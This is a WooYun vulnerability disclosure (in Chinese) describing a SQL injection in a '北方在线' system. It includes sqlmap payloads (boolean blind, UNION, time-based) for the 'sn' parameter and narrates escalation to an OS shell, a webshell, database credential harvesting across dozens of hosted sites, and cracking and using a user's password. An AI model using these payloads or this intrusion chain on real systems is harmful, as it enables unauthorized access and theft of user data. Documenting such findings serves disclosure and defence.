当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112842

漏洞标题:北方在线一个SQL注入引发的血案(造成数十个互联网信息系统沦陷)

相关厂商:北方在线

漏洞作者: littelfire

提交时间:2015-05-08 14:44

修复时间:2015-06-22 14:46

公开时间:2015-06-22 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-06-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

北方在线服务器存在sql注入漏洞

详细说明:

mask 区域 
1.http://**.**.**/


该地址为北方在线信息系统,存在sql注入漏洞,可利用注入写马,从而获取数十个信息系统的控制权限及数据库信息。

漏洞证明:

首先是注入点:h

mask 区域 
1.ttp://**.**.**/download/info.phpsn=33e75ff09dd601bbe69f351039152189


sn处存在sql注入

Place: GET
Parameter: sn
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: sn=33e75ff09dd601bbe69f351039152189' AND 5985=5985 AND 'vHEB'='vHEB
    Type: UNION query
    Title: MySQL UNION query (NULL) - 25 columns
    Payload: sn=33e75ff09dd601bbe69f351039152189' UNION ALL SELECT NULL,NULL,CONCAT(0x7173737071,0x4e62686764597156456e,0x716a746c71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: sn=33e75ff09dd601bbe69f351039152189' AND SLEEP(5) AND 'kYWm'='kYWm


看了一下数据库真不少,还是dba权限

0.jpg


直接可以用--os-shell反弹shell,执行系统命令

1.jpg


直接echo一句话进去写shell

3.jpg


登录进去执行一下命令

6.jpg


看一下服务器上的信息系统,吓了一跳,有几十个信息系统挂在上面。。。

7.jpg


访问几个上面的域名

8.jpg


12.jpg


13.jpg


17.jpg


感觉像是一个系统托管服务器,ip反查一下域名,有57个域名挂在这个服务器上。。。

18.jpg


找一下数据库配置文件

5.jpg


连接数据库,看了几个系统的用户表

9.jpg


10.jpg


11.jpg


14.jpg


破解了一个租客网上的用户密码,成功登了上去

15.jpg


16.jpg


不挨个试了,就到这吧。。。。

修复方案:

。。。。。。

版权声明:转载请注明来源 littelfire@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)